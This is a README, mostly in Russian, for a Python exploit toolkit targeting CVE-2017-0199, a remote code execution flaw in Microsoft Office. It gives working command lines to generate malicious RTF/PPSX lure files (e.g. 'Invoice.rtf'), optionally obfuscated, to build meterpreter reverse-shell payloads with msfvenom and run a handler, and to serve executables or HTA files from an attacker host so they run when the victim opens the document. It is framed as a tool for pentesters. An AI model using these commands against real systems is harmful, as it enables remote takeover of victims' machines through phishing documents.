
Exploit toolkit CVE-2017-0199 - v4.0 is a handy python script which provides pentesters and security researchers a quick and effective way to test Microsoft Office RCE. It could generate a malicious RTF/PPSX file and deliver metasploit / meterpreter / other payload to victim without any complex configuration.
Эксплойт-тулкит CVE-2017-0199 - v4.0 — это удобный скрипт на Python, который предоставляет пентестерам и исследователям безопасности быстрый и эффективный способ тестирования RCE в Microsoft Office. Он может сгенерировать вредоносный RTF/PPSX-файл и доставить metasploit / meterpreter / другие полезные нагрузки жертве без сложной настройки.
Эта программа предназначена ТОЛЬКО для образовательных целей. Не используйте её без разрешения. Применяются стандартные оговорки, особенно тот факт, что я (bhdresh) не несу ответственности за любой ущерб, причинённый прямым или косвенным использованием информации или функциональности, предоставленной этими программами. Ни автор, ни какой-либо интернет-провайдер не несёт ОТВЕТСТВЕННОСТИ за содержание или неправомерное использование этих программ или любых их производных. Используя эту программу, вы принимаете тот факт, что любой ущерб (потеря данных, сбой системы, компрометация системы и т.п.), причинённый использованием этих программ, не является ответственностью bhdresh.
Наконец, это личная разработка, пожалуйста, уважайте её философию и не используйте её во вред!
Лицензия CC BY 4.0 - https://creativecommons.org/licenses/by/4.0/
В скрипт добавлены следующие возможности
- Генерация вредоносного PPSX-файла
- Режим эксплуатации для сгенерированного PPSX-файла
- Обновлён template.ppsx
Версия: Python 2.7.13
1) Создать вредоносный RTF-файл
# python cve-2017-0199_toolkit.py -M gen -t RTF -w Invoice.rtf -u http://192.168.56.1/logo.doc
2) (Необязательно, при использовании MSF-полезной нагрузки): Создать полезную нагрузку metasploit и запустить обработчик
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f exe > /tmp/shell.exe
# msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.56.1; run"
3) Запустить тулкит в режиме эксплуатации для доставки локальной полезной нагрузки
# python cve-2017-0199_toolkit.py -M exp -t RTF -e http://192.168.56.1/shell.exe -l /tmp/shell.exe

1) Создать вредоносный RTF-файл
# python cve-2017-0199_toolkit.py -M gen -t RTF -w Invoice.rtf -u http://192.168.56.1/logo.doc
2) Запустить тулкит в режиме эксплуатации для доставки удалённой полезной нагрузки
# python cve-2017-0199_toolkit.py -M exp -t RTF -e http://remoteserver.com/shell.exe

1) Создать вредоносный RTF-файл
# python cve-2017-0199_toolkit.py -M gen -t RTF -w Invoice.rtf -u http://192.168.56.1/logo.doc -x 1
2) Запустить тулкит в режиме эксплуатации для доставки пользовательского HTA-файла
# python cve-2017-0199_toolkit.py -M exp -t RTF -H /tmp/custom.hta

# python cve-2017-0199_toolkit.py -h
Это удобный набор инструментов для эксплуатации CVE-2017-0199 (удалённое выполнение кода в Microsoft Office)
Режимы:
-M gen Создать только вредоносный файл
Создать вредоносный RTF/PPSX-файл:
-w <Filename.rtf/Filename.ppsx> Имя вредоносного RTF/PPSX-файла (передайте этот файл жертве).
-u <http://attacker.com/test.hta> Путь к HTA/SCT-файлу. Обычно это домен или IP-адрес, где запущен этот
инструмент.
Например, http://attackerip.com/test.doc (этот URL будет включён в вредоносный RTF/PPSX-файл и будет запрошен, как только жертва откроет вредоносный RTF-файл.
-t RTF|PPSX (по умолчанию = RTF) Тип создаваемого файла.
-x 0|1 (по умолчанию = 0) Создать обфусцированный RTF-файл. 0 = отключено, 1 = включено.
-M exp Запуск режима эксплуатации
Эксплуатация:
-t RTF|PPSX (по умолчанию = RTF) Тип файла для эксплуатации.
-H </tmp/custom> Локальный путь к пользовательскому HTA/SCT-файлу, который необходимо доставить и выполнить на цели.
ПРИМЕЧАНИЕ: Эта опция не доставляет полезные нагрузки, указанные в опциях "-e" и "-l"
-p <TCP port:Default 80> Номер локального порта.
-e <http://attacker.com/shell.exe> Путь к исполняемому файлу / meterpreter shell / полезной нагрузке, которую необходимо выполнить на цели.
-l </tmp/shell.exe> Если полезная нагрузка размещена локально, укажите локальный путь к исполняемому файлу / meterpreter shell / полезной нагрузке.
@nixawk за пример RTF, @Li Haifei, @bhdresh
Очевидно, я не разработчик на полную ставку, так что возможны сбои.
Пожалуйста, сообщайте об ошибках и проблемах через https://github.com/bhdresh/CVE-2017-0199/issues/new